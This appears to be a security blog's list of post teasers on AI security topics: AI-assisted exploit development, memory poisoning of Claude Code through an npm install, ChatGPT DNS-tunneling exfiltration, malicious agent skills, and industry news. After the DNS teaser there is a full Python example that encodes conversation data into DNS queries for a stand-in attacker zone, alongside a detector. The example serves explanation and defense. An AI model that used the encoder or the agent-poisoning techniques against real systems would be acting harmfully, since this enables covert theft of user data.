Google’s threat researchers caught what they believe is the first zero-day exploit built with AI assistance. The part worth understanding is the technique the attackers used to get the AI to help.
Cisco’s AI Threat Research team showed how a single npm install can persistently poison Claude Code’s memory, turning a trusted coding assistant into a quiet source of insecure guidance. The technical details matter, and so do the governance gaps they expose.
Anthropic shipped Claude Opus 4.7 today as its most capable generally available model, but the cybersecurity story is bigger than the benchmarks. The model includes automated safeguards that block high-risk cyber requests, deliberately reduced offensive capabilities compared to Mythos Preview, and a new Cyber Verification Program that gates legitimate security use behind a formal application process. This is the first generally available model where Anthropic is actively testing the controls it needs before it can release Mythos-class capabilities to the public.
Anthropic launched Project Glasswing with 12 major tech companies, using its unreleased Claude Mythos Preview model to find and patch zero-day vulnerabilities at a scale and speed that didn’t exist six months ago. The implications for vulnerability management, patching cycles, and defensive security programs are enormous.
Check Point Research disclosed a ChatGPT vulnerability that used DNS tunneling to silently exfiltrate conversation data from an isolated runtime. The technique is decades old. The blind spot that enabled it is not.
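The teaser names the technique but not the mechanics, so here is an added, self-contained illustration of both sides: how conversation data gets chunked into DNS query names that leave a sandbox through a resolver, and the log check a defender would run to catch it. This is example code, not Check Point's proof of concept and not the ChatGPT runtime's behaviour; the zone `exfil-example.test`, the `epoch client qname qtype` log format, the sample transcript and the thresholds are all constructed for illustration.

```python
"""DNS-tunnel exfiltration, encoder and detector side by side.

Added example, not Check Point's code or the ChatGPT runtime's behaviour.
The zone name, the log format, the sample data and the thresholds are all
constructed for illustration.
"""
import base64
import math
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical limit for a full hostname in text form
ZONE = "exfil-example.test"   # assumed attacker-controlled zone (constructed)


def encode_exfil(data: bytes, zone: str, labels_per_query: int = 3) -> list[str]:
    """Chunk data into base32 labels and wrap each group in a query name.

    Each name carries a sequence label so the receiver can reorder queries
    that arrive out of order through recursive resolvers.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names = []
    for seq, i in enumerate(range(0, len(labels), labels_per_query)):
        name = ".".join([f"s{seq}", *labels[i:i + labels_per_query], zone])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_exfil(names: list[str], zone: str) -> bytes:
    """Reassemble what the authoritative server for `zone` would see."""
    chunks = {}
    for name in names:
        seq_label, *data_labels = name[: -(len(zone) + 1)].split(".")
        chunks[int(seq_label[1:])] = "".join(data_labels)
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def shannon_entropy(s: str) -> float:
    """Bits per character; base32 payloads sit near 5, real hostnames far lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_zones(log_lines, min_len=40, min_entropy=3.5, min_hits=2):
    """Flag zones that receive repeated long, high-entropy subdomain queries.

    log_lines: constructed 'epoch client qname qtype' records.
    The registered domain is taken as the last two labels; production code
    should use the public suffix list instead.
    """
    hits = defaultdict(set)
    for line in log_lines:
        _, _, qname, _ = line.split()
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue
        zone = ".".join(labels[-2:])
        sub = "".join(labels[:-2])
        if len(sub) >= min_len and shannon_entropy(sub) >= min_entropy:
            hits[zone].add(sub)
    return {z: len(s) for z, s in hits.items() if len(s) >= min_hits}


# Constructed stand-in for a conversation transcript.
SAMPLE = (b"user: what is the staging database password?\n"
          b"assistant: I can't share credentials, but here is how to rotate them.\n") * 3


def build_sample_log() -> list[str]:
    """Mix benign lookups with the tunnelled queries (all constructed)."""
    benign = ["www.example.com", "api.example.com", "cdn-assets.example.com",
              "updates.vendor.test", "mail.example.com"]
    lines = [f"{1712000000 + i} 10.0.0.5 {q} A" for i, q in enumerate(benign)]
    for i, q in enumerate(encode_exfil(SAMPLE, ZONE)):
        lines.append(f"{1712000100 + i} 10.0.0.5 {q} A")
    return lines


if __name__ == "__main__":
    names = encode_exfil(SAMPLE, ZONE)
    assert decode_exfil(names, ZONE) == SAMPLE
    print(f"{len(SAMPLE)} bytes left the sandbox in {len(names)} DNS queries")
    print("flagged:", suspicious_zones(build_sample_log()))
```

The point of running both halves together is the blind spot the teaser refers to: an "isolated" runtime that still resolves arbitrary names has an egress channel, because every query is delivered to the zone's authoritative server whether or not any answer comes back. The detector is the cheap first check, but the real fix is to deny outbound DNS from the sandbox (or pin it to a resolver that only answers for an allowlist), not to tune entropy thresholds.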
RSAC 2026 opens today at the Moscone Center in San Francisco. I’m not there in person this year, but I’ve spent the past week tracking every pre-conference announcement, keynote preview, and vendor press release. There’s a lot to take in, so here’s my attempt to highlight what’s most relevant for practitioners this week.
The conference covers a wide range of ground this year. Post-quantum cryptography, supply chain security, social engineering, cloud security, governance under the EU AI Act, workforce burnout, and even vibe coding as an emerging security risk all have dedicated sessions and tracks. RSAC itself identified seven key trends from this year’s submissions: MCP, agentic AI, vibe coding, identity, governance, addressing burnout, and the power of partnerships.
Non-human identities (NHIs) are the privileged service account problem reborn at 100x scale. Same mistakes, same inertia, same excuses. Except now the service account can reason, make decisions, and talk to other service accounts autonomously.
PCI DSS v4.x wasn’t written with AI in mind, but the framework is more adaptable than it gets credit for. Here’s where the standard holds up, where there’s room to grow, and how the PCI SSC is already engaging with AI through initiatives like The AI Exchange.
AI agents are no longer chatbots. They call APIs, execute code, and make decisions with real consequences. The OWASP Agentic Top 10 is the first industry framework built to address this new attack surface, and the numbers behind it should concern every security professional.
OpenClaw has made remarkable security strides since my January article: it hired dedicated security leadership, patched 40+ vulnerabilities, and partnered with VirusTotal. Then ClawHavoc exposed 341 malicious skills. And now the founder has just joined OpenAI. A breakdown of everything that changed, what still worries me, and how to think about deploying OpenClaw in this new reality.